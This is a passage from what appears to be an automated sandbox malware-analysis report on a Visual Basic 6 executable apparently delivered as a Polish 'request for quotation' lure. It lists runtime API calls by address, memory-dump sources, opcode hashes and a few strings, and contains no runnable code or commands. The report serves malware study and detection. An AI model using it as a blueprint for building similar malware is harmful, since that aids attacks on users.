                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00422D1B
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422D39
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422D67
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000), ref: 00422D6E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00422D79
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422D89
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00422D94
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00422DA4
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422DB1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00422DCC
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00422DEA
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000003), ref: 00422DFB
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000), ref: 00422E02
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00422E0D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 00422E22
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000), ref: 00422E29
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422E50
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00422E76
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000004), ref: 00422E97
                                                                                                                                                                                                                                                      • #618.MSVBVM60(00000000), ref: 00422E9E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00422EA9
                                                                                                                                                                                                                                                      • __vbaI4Str.MSVBVM60(00000000), ref: 00422EB0
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422EC7
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00422EDA
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00422EE1
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00422F2A), ref: 00422F1A
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00422F23
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 00422F40
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 277344030-0
                                                                                                                                                                                                                                                      • Opcode ID: 80d27adf0f7515f30dffb66509e59b70ef8c6a723e0b90cbf6394fe901ba1ca0
                                                                                                                                                                                                                                                      • Instruction ID: 0dbf9007f3e025cc507390632291acf7cd708b816fac69f1e160cd6eff4667e3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80d27adf0f7515f30dffb66509e59b70ef8c6a723e0b90cbf6394fe901ba1ca0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8091C871D00248EFDB04DFA0DA48BDEBBB8FB48705F108169E612B76A0DB745A49CF64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 0040D69B
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D6B2
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D6D3
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040D6FA
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D724
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D749
                                                                                                                                                                                                                                                      • __vbaLateIdCallLd.MSVBVM60(?,?,68030000,00000000), ref: 0040D75E
                                                                                                                                                                                                                                                      • __vbaI4Var.MSVBVM60(00000000), ref: 0040D768
                                                                                                                                                                                                                                                      • __vbaLateMemCallLd.MSVBVM60(?,?,hwnd,00000000,00008003), ref: 0040D78A
                                                                                                                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(00000000), ref: 0040D794
                                                                                                                                                                                                                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D7A2
                                                                                                                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040D7B2
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0040D7DF
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0040D7EC
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$CallCheckExitHresultLateListProc$Error
                                                                                                                                                                                                                                                      • String ID: MR$ RO$Once$hwnd
                                                                                                                                                                                                                                                      • API String ID: 1721777011-1584818490
                                                                                                                                                                                                                                                      • Opcode ID: f1c211779c0b3bb3b88594b85937cb88ccef8d8afbaf8a30aea8c47be55a5225
                                                                                                                                                                                                                                                      • Instruction ID: 3a18aed98be3068f103a5839567168951ce735157339c65100099b40d738d62c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1c211779c0b3bb3b88594b85937cb88ccef8d8afbaf8a30aea8c47be55a5225
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24B10771900204EBDB04DFE4DD49BAEBBB8FF48700F50816AE505B72A1DB785945CBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,00000000,Function_000032B6), ref: 0041F2DE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F30E
                                                                                                                                                                                                                                                      • #717.MSVBVM60(?,00004008,00000040,00000000), ref: 0041F33D
                                                                                                                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041F347
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F352
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F35B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041F38A
                                                                                                                                                                                                                                                      • #717.MSVBVM60(?,00004008,00000040,00000000), ref: 0041F3B9
                                                                                                                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041F3C3
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F3CE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041F3D9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F3E2
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F3EB
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,Remark for ), ref: 0041F411
                                                                                                                                                                                                                                                      • #717.MSVBVM60(?,00000008,00000040,00000000), ref: 0041F430
                                                                                                                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041F43D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F448
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041F453
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F45C
                                                                                                                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041F46F
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0041F4CF
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F4DD
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F4EB
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F4F4
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00406F68,?,?,?), ref: 0041F515
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000002,00000000), ref: 0041F525
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00406F68,?,?), ref: 0041F53B
                                                                                                                                                                                                                                                      • __vbaRecDestructAnsi.MSVBVM60(00406F68,?), ref: 0041F54D
                                                                                                                                                                                                                                                      • __vbaRecDestructAnsi.MSVBVM60(00406F68,?,0041F5A5), ref: 0041F586
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F58F
                                                                                                                                                                                                                                                      • __vbaRecDestruct.MSVBVM60(00406F68,?), ref: 0041F59E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$Ansi$#717CopyDestructError$System$ChkstkListUnicode
                                                                                                                                                                                                                                                      • String ID: P$Remark for
                                                                                                                                                                                                                                                      • API String ID: 3958374764-404550290
                                                                                                                                                                                                                                                      • Opcode ID: 3836bbc5565a20a4707f8b3767ffc18a2dee7e207138df64e28d7e6c74dad988
                                                                                                                                                                                                                                                      • Instruction ID: 57f6e2307a2881c8932ec88b1fdace90c080974f77e0174b8cc4dbb87e3633e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3836bbc5565a20a4707f8b3767ffc18a2dee7e207138df64e28d7e6c74dad988
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2081FAB1900249EFDB14DFA0DE49BDEBBB8FB48305F108169E506BB2A0DB745A49CF54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • #594.MSVBVM60(?,6CF8D9F5,-00000001,6CF8D8B1), ref: 0041127A
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                                                                                                                                                                                      • #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                                                                                                                                                                                      • #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                                                                                                                                                                                      • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 004113D6
                                                                                                                                                                                                                                                      • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 00411464
                                                                                                                                                                                                                                                      • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0041147C
                                                                                                                                                                                                                                                      • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 00411483
                                                                                                                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 004114A0
                                                                                                                                                                                                                                                      • #537.MSVBVM60(?,?), ref: 004114B4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?), ref: 004114C5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 004114C8
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?), ref: 004114D3
                                                                                                                                                                                                                                                      • #537.MSVBVM60(?,00000000,?,?), ref: 004114D7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 004114E2
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 004114EB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 004114F2
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 004114F6
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 00411501
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 00411504
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0041150B
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 00411523
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041154C
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(004115AE), ref: 004115A7
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 004115C9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                                                                                                                                                                                      • String ID: gfff$gfff
                                                                                                                                                                                                                                                      • API String ID: 2397813863-3084402119
                                                                                                                                                                                                                                                      • Opcode ID: 62ef2a4d85f8eb3fe8f937d03407a8f9ec95a64fd7d0ffd1317382de30af7ef6
                                                                                                                                                                                                                                                      • Instruction ID: 89f21965ee05a7b64c3006bf8dd978c4399402eb5f0bddd0a045db34c415a49c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62ef2a4d85f8eb3fe8f937d03407a8f9ec95a64fd7d0ffd1317382de30af7ef6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B9162B1E00249AFCB08DFA4DD45BDDBBFAEB88301F10412AE50AE7264EB345985CF54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0040C87B,00000000), ref: 0041A5BE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041A5EE
                                                                                                                                                                                                                                                      • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,?,?,00000000,Function_000032B6), ref: 0041A5FF
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A60E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A62A
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041A664
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041A67A
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041A693
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000104), ref: 0041A6BC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041A6C7
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041A6FE
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041A73D
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0041A758
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041A77E
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041A78F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041A7A4
                                                                                                                                                                                                                                                      • #616.MSVBVM60(?,?,?,00000000), ref: 0041A7B9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A7C7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041A7DE
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041A7EA
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 0041A7FB
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,?,00000001,?,00000000), ref: 0041A822
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A830
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000000), ref: 0041A83C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A84A
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 0041A853
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 0041A879
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128,?,00000000), ref: 0041A8BA
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 0041A8D0
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?,?,00000000), ref: 0041A8E9
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 0041A90D
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041A96B), ref: 0041A937
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041A94F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041A958
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041A964
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$FreeSystem$AnsiMove$#525#616BoundsBstrChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1820427907-0
                                                                                                                                                                                                                                                      • Opcode ID: 966c6123da24b71d08ec0f7a5c1a4cfb51299011817f3b4dc7b4b5ec285d64dd
                                                                                                                                                                                                                                                      • Instruction ID: da6c7bdc064fde5d6e21051214ad5d77861f7fd9d568965cd9a71694eebb6c89
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 966c6123da24b71d08ec0f7a5c1a4cfb51299011817f3b4dc7b4b5ec285d64dd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5A11975901259DBDB14EFA0DE4DBDEB7B4FB48304F1081A9E10AB72A0DB745A84CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 004193DE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 0041940E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00419428
                                                                                                                                                                                                                                                      • __vbaRedim.MSVBVM60(00000000,0000004C,?,00000000,00000001,?,00000000), ref: 00419458
                                                                                                                                                                                                                                                      • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 0041947D
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,?), ref: 00419495
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004194C9
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004194DA
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 004194FA
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(00000000), ref: 00419504
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,?), ref: 00419519
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041954D
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041955E
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(00000000,?), ref: 0041956F
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004195A3
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004195B7
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 004195E6
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(00000000), ref: 004195F0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(00000000), ref: 004195FA
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(00000000,?), ref: 00419650
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,00419803), ref: 004197F0
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004197FC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
